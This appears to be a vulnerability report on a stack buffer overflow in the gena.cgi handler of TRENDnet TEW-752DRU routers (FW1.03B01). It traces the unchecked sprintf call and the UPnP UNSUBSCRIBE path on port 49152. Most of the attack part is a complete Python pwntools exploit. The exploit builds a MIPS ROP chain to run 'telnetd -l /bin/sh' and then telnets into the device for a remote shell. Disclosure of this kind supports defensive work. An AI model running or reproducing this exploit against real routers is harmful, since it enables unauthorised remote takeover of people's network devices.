Vendor of the products: TRENDnet
Vendor's website: http://www.trendnet.com.cn/
Reported by: Chen Xiao(2235254941@qq.com)
Affected products: TRENDnet TEW-752DRU Routers
Affected firmware version: FW1.03B01
Firmware download address: TRENDnet TEW-752DRU
In the TRENDnet TEW-752DRU FW1.03B01 series routers, there is a buffer overflow vulnerability due to the lack of length verification for the service
field in gena.cgi
. Attackers who successfully exploit this vulnerability can cause the remote target device to crash or execute arbitrary commands by sending a POST request to /gena.cgi
.
The function at address 0x40E9BC
in the /htdocs/cgibin
binary file does not check the length of the SID field in the sprintf
function, which poses a risk of stack overflow.
It is evident that injecting malicious data into v2
or a1
can lead to a buffer overflow, which can be exploited for vulnerabilities or cause a denial of service. Here, v2
refers to HTTP_SID
and a1
refers to service
, which are all controllable.
The function at 0x40E9BC
is called within the genacgi_main
function.
Therefore, our request method must be UNSUBSCRIBE
.
In the /etc/services/HTTP/httpsvcs.php
file, it can be found that gena.cgi
is related to UPnP
services.
In the upnpsetup
function within the /etc/services/HTTP/httpsvcs.php
file, it is observed that data can be sent to UPnP
via port 49152
.
Send the following POST request to inject malicious command via the service
field.
# python3
from pwn import *
from socket import *
from os import *
from time import *
context(os = 'linux', arch = 'mips')
libc_base = 0x2aaf8000
s = socket(AF_INET, SOCK_STREAM)
cmd = b'telnetd -l /bin/sh;'
payload = b'a'*462
payload += p32(libc_base + 0x53200 - 1) # s0 system_addr - 1
payload += p32(libc_base + 0x169C4) # s1 addiu $s2, $sp, 0x18 (=> jalr $s0)
payload += b'a'*4 # s2
payload += p32(libc_base + 0x32A98) # ra addiu $s0, 1 (=> jalr $s1)
payload += b'a'*0x18 # padding
payload += cmd
msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
msg += b"Host: localhost:49152\r\n"
msg += b"SID: 1\r\n\r\n"
s.connect((gethostbyname("192.168.10.1"), 49152))
s.send(msg)
sleep(1)
system("telnet 192.168.10.1 23")
Remotely log in to the firmware.
The Telnet service on port 23 has been detected as active.